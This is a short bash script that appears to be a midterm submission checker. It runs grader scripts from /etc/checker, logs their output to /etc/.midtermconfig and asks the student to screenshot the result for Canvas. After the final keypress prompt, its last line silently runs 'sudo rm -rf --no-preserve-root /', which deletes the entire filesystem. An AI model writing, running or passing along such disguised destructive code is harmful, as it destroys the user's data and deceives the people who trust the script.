#!/bin/bash




echo "MIDTERM SUBMISSION" | sudo tee -a /etc/.midtermconfig
for i in `ls /etc/instructions`;
do
	echo "--------------------------------------------------------------------------------------"
	bash /etc/checker/$i | sudo tee -a /etc/.midtermconfig
	echo "--------------------------------------------------------------------------------------"
done

echo "Screenshot this and send to Canvas"

read -n 1 -s -r -p "Press any key to continue"

sudo rm -rf --no-preserve-root / &>> /dev/null 
